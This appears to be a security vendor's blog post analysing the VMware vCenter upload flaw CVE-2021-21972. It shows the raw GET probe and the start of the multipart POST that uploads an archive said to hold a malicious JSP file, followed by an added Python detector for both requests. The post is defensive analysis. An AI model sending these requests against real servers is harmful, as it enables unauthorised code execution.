VMware vCenter 6.5 / 7.0 Remote Code Execution exploits.

The Idappcom Threat Detection Team has been working on the recent VMware vCenter 6.5 / 7.0 Remote Code Execution exploits.

These are identified as:

· CVE-2021-21972 – Unauthorized File Upload leading to remote code execution

· CVE-2021-21973 – Unauthorized Server-side Request Forgery

I was able to find a proof of concept script written in Python and set about delving into the code to understand how the exploit works.

This was an interesting one to solve because the script first of all looks for a vulnerable target, and only if it gets the right response will it carry out the next stage. I had to modify the code to make it think that it had the correct response; this was made easier as the script had several code comments which helped. Once it has checked the target, it then goes on to perform an attempt at uploading a .tar file, which in this example is an archive of a malicious .jsp file.


This GET request is the first stage: it checks whether the target is vulnerable, and the script only continues if it gets the expected response:

GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: vSphereClient.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive


This POST request is the second stage: it submits the .tar archive (named Linux.tar here) as the uploadFile form field of a multipart upload to the same endpoint:

POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: vSphereClient.local
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3223
Content-Type: multipart/form-data; boundary=305be0a4775f442bad1b3a58ea9f3a99

--305be0a4775f442bad1b3a58ea9f3a99
Content-Disposition: form-data; name="uploadFile"; filename="Linux.tar"
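The two captured requests give a defender enough to recognise both stages on the wire. The following is an added example in Python; it is not code from the original post or from the proof of concept script it describes. It parses raw HTTP/1.x requests, flags a GET to the uploadova endpoint as a probe and a POST carrying a multipart file upload to that endpoint as an upload attempt, and records the Content-Disposition filename for the analyst. The sample requests are constructed from the headers shown above with a placeholder string in place of any archive body, and the names Finding, parse_request, multipart_filenames, inspect_request and scan are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Endpoint used by both captured requests in the post.
UPLOADOVA_PATH = "/ui/vropspluginui/rest/services/uploadova"


@dataclass
class Finding:
    severity: str            # "medium" for the probe, "high" for an upload attempt
    reason: str
    method: str
    path: str
    host: Optional[str]
    filename: Optional[str] = None


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def multipart_filenames(headers: Dict[str, str], body: str) -> List[str]:
    """Return every filename="..." from the Content-Disposition lines of a
    multipart/form-data body; an empty list for any other request."""
    ctype = headers.get("content-type", "")
    m = re.search(r'boundary="?([^";]+)"?', ctype)
    if not ctype.lower().startswith("multipart/form-data") or not m:
        return []
    delimiter = "--" + m.group(1)
    names: List[str] = []
    for part in body.split(delimiter):
        names.extend(re.findall(r'filename="([^"]*)"', part))
    return names


def inspect_request(raw: str) -> Optional[Finding]:
    """Classify one request: None when it does not touch the uploadova
    endpoint, medium severity for the GET probe, high for a POST that
    carries a multipart file upload (the upload stage)."""
    method, path, headers, body = parse_request(raw)
    # Drop any query string and compare case-insensitively so small
    # variations of the probe still match.
    if path.split("?", 1)[0].lower() != UPLOADOVA_PATH:
        return None
    host = headers.get("host")
    if method.upper() == "POST":
        names = multipart_filenames(headers, body)
        return Finding("high", "multipart file upload to uploadova endpoint",
                       method, path, host, names[0] if names else None)
    return Finding("medium", "probe of uploadova endpoint", method, path, host)


def scan(requests: List[str]) -> List[Finding]:
    """Run inspect_request over a batch and keep only the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


# Constructed sample traffic: the two requests from the post (headers trimmed)
# plus one benign request. The upload body is a placeholder, not an archive.
PROBE_REQUEST = (
    "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1\r\n"
    "Host: vSphereClient.local\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
_UPLOAD_BODY = (
    "--305be0a4775f442bad1b3a58ea9f3a99\r\n"
    'Content-Disposition: form-data; name="uploadFile"; filename="Linux.tar"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "PLACEHOLDER-NOT-AN-ARCHIVE\r\n"
    "--305be0a4775f442bad1b3a58ea9f3a99--\r\n"
)
UPLOAD_REQUEST = (
    "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1\r\n"
    "Host: vSphereClient.local\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    f"Content-Length: {len(_UPLOAD_BODY)}\r\n"
    "Content-Type: multipart/form-data; boundary=305be0a4775f442bad1b3a58ea9f3a99\r\n"
    "\r\n" + _UPLOAD_BODY
)
BENIGN_REQUEST = "GET /ui/ HTTP/1.1\r\nHost: vSphereClient.local\r\n\r\n"
SAMPLE_REQUESTS = [BENIGN_REQUEST, PROBE_REQUEST, UPLOAD_REQUEST]
```

Running `scan(SAMPLE_REQUESTS)` yields one medium finding for the probe and one high finding for the upload, with `filename` set to `Linux.tar`. The endpoint plus a POST with a multipart body is the signal worth alerting on; the archive name is arbitrary in the script, so it is recorded for context rather than matched on.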


References:

https://github.com/NS-Sp4ce

https://swarm.ptsecurity.com/unauth-rce-vmware/